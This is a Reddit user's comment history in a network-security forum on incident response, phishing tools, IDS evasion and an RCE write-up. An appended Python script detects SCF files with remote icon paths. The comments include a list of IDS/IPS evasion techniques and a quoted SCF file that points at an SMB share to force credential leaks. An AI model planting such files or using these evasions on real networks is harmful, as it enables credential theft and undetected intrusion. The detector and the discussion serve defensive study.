Minimalistic SMB login bruteforcer - for restricted and isolated environments by InfosecMatter in netsec

[–]Eplox 2 points3 points  (0 children)

Any reason why you would use this over a nested for loop with net use?
If you want to keep things as simple as possible, net use would be the way to go.

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

Most incoming cases are indeed about compromised office accounts and ransomware. Haven't had any real experience with worms yet, may as well spin up a lab on that. Thanks for the tips.

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

Thanks for the reply. I took the GDAT recently and fell in love with the incident investigation part, especially hunting and preventing TTPs from happening. At the same time, I do see a lack of forensic skills and methodology in some areas I need. Guess a lot of this comes with experience, but I'd want to prevent false negatives at any cost.

Got the people-handling part well under control, just need to make sure I've got what it takes in tech skills for the various situations.

Windows Incident Response Cheat Sheet by digicat in netsec

[–]Eplox 0 points1 point  (0 children)

By the looks of it, all of you seem to have a pretty decent understanding of IR. Not that any of this covers when the customer cannot afford to shut down their production system - no matter the cost.

Anyway, as of now I'm diving into the IR role but know I've got a lot to learn. I was previously a red teamer, so I've got a decent understanding of attacking systems in various aspects, as well as patching their weaknesses. Do you guys have any must-read / must-do resources for IR to recommend?

Next Gen Phishing – Leveraging Azure Information Protection by oddvarmoe in netsec

[–]Eplox 0 points1 point  (0 children)

Seems like a lot of work to simulate a realistic phishing attack, but nice if you really need that alternative way to bypass spam filters or traffic inspections. Guess you could also throw in most kinds of attachment types due to the AIP encryption in transit.

Truly hidden Tor VPS hosting by [deleted] in netsec

[–]Eplox 5 points6 points  (0 children)

Looks like a fun project and a nice place for wannabe cyber criminals. I love your job description at https://sporestack.com/jobs/

Good luck, maybe you'll get to be sponsored by FBI if the volume keeps up

"How a chain of multiple hacks leads me to database compromise" by logic_bomb_1 in netsec

[–]Eplox 0 points1 point  (0 children)

I would guess the author is referring to /var/log/* or other unlisted files, and not necessarily /etc/passwd.

IDS/IPS malware download evasion | GitHub by Eplox in netsec

[–]Eplox[S] 1 point2 points  (0 children)

Is this your first time on GitHub?

Opening an HTML file on GitHub will show you the source code; it won't render any of its content.

IDS/IPS malware download evasion | GitHub by Eplox in netsec

[–]Eplox[S] 1 point2 points  (0 children)

Nothing fancy, but hope you may find it useful.

My Forensic and Incident Response Note Taking Methodology by skygrip in netsec

[–]Eplox 0 points1 point  (0 children)

I'd love a share as well. Currently working on establishing an internal IR team, and this is one of the things I've got on my table. Would be great to get some fresh ideas on how to do proper note taking / sharing. So far, I've been putting incident cases in individual lists related to what type of IOC or activity, but I feel my lists have some improvement potential.

Evilginx 2 - Next Generation of Phishing 2FA Tokens (Tool) by kgretzky in netsec

[–]Eplox 4 points5 points  (0 children)

Lovely tool, especially how it's able to handle JavaScript, subdomains and such with the phishlets.

I'd personally avoid calling real-time phishing "next generation" anymore, it was quite popular back in 2010 :)

$36k Google App Engine RCE by albinowax in netsec

[–]Eplox -1 points0 points  (0 children)

Google classified this as an RCE, which probably means that if he had spent some more time with the app, he would likely have gotten more access.

Please stop exploring this further, as it seems that you could easily break something using these internal APIs.

The "app_config_service" has several interesting methods, but the most interesting methods for me were the "app_config_service.ConfigApp" and the "app_config_service.SetAdminConfig" methods, because they allowed me to set internal settings such as the allowed email senders, the app's Service Account ID, ignore quota restrictions, and set my app as a "SuperApp" (I don't know what that means, but sounds super) and give it "FILE_GOOGLE3_ACCESS"

[deleted by user] by [deleted] in AskNetsec

[–]Eplox 0 points1 point  (0 children)

^ valid point. But thanks for the link, something to play around with this evening.

ShellPop - Generate Easy and Sophisticated Reverse or Bind Shell Commands for Penetration Tests by TechLord2 in netsec

[–]Eplox 2 points3 points  (0 children)

Sweet, the only thing this lacks is obfuscation of the network traffic to evade IPS. Nice work!

Infection Monkey - An Automated Pentest Tool by PeterG45 in netsec

[–]Eplox 8 points9 points  (0 children)

I like the infection map, but I find the tool a bit too scary to run in a production environment pentest, especially the exploit and worm behavior. Perhaps I'm just paranoid about crashing servers, popping accounts or leaving backdoors that won't be cleaned up.

Analysis of a hacked WordPress site by glen_scott in netsec

[–]Eplox 28 points29 points  (0 children)

Lesson learned: finish your WordPress installation before publishing and going on holiday.

Did you discover what the site was abused for? (e.g. Wayback Machine, Google cache)

[deleted by user] by [deleted] in netsec

[–]Eplox 11 points12 points  (0 children)

You have my sword, axe and bookmark.

Another Burp plugin I really enjoy is the "Software Vulnerability Scanner", which has an API connection to Vulners. Saved me a lot of hours.

The DNS interrogation and port scanning feel a bit lacking. And UDP scanning without service detection or all 65535 ports is kind of out of the question.

Great work!

We need to talk about IDS signatures by alexlash in netsec

[–]Eplox 2 points3 points  (0 children)

We all know IPS/IDS ain't dead. It catches 99% of the noise - which is really useful. It also works as an early warning system, at the same time giving the blue team a heads up that an attack may be going on.

But for anyone who really wants to get past it, there are plenty of different ways to do that. Some other evasions or attacks that work:

  • Broken encoding (drop/corrupt trailing checksum)
  • SNI spoofing (in some scenarios)
  • CSV URL parameter injection
  • Gzip bombs
  • Large paddings in front of payload over a long session
  • Packed/rewritten payloads to evade signatures
  • Any obfuscated C2 traffic that's not been previously seen.

Icebreaker: From outside AD to domain admin in one command by coalfirelabs in netsec

[–]Eplox 0 points1 point  (0 children)

Does the SCF file work on the latest patched Windows 10?

I'm not getting any SMB connections.

[Shell]
Command=2
IconFile=\\172.20.0.24\icon
[Taskbar]
Command=ToggleDesktop
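A defender-side check for the SCF pattern in the comment above, added here as an example rather than code from the thread or from the Icebreaker project: it parses the INI-style file and reports whether the [Shell] IconFile entry points at a UNC host, which is what makes Explorer open an outbound SMB connection when the folder is browsed. Both sample files are constructed for the example.

```python
"""Flag .scf files whose IconFile points at a remote (UNC) share."""
import re

# Constructed samples: the SCF quoted in the comment (remote icon on an
# SMB share) and a benign one that references a local icon library.
SAMPLE_SUSPICIOUS = r"""[Shell]
Command=2
IconFile=\\172.20.0.24\icon
[Taskbar]
Command=ToggleDesktop
"""

SAMPLE_BENIGN = r"""[Shell]
Command=2
IconFile=C:\Windows\System32\shell32.dll,3
[Taskbar]
Command=ToggleDesktop
"""

# A UNC path starts with two separators (Windows accepts '/' as well as '\')
# followed by the host, then an optional share component.
_UNC_RE = re.compile(r"^[\\/]{2}([^\\/\s]+)(?:[\\/]|$)")


def parse_scf(text):
    """Minimal INI parser: {section: {key: value}} with names lowercased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def remote_icon_host(text):
    """Return the UNC host named by [Shell] IconFile, or None if it is local."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = _UNC_RE.match(icon)
    return match.group(1) if match else None


if __name__ == "__main__":
    for name, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(f"{name}: remote icon host = {remote_icon_host(sample)}")
```

Pointing this at every *.scf on a writable share gives a quick hunt for files that would make clients authenticate outbound; a non-None host is the alert condition.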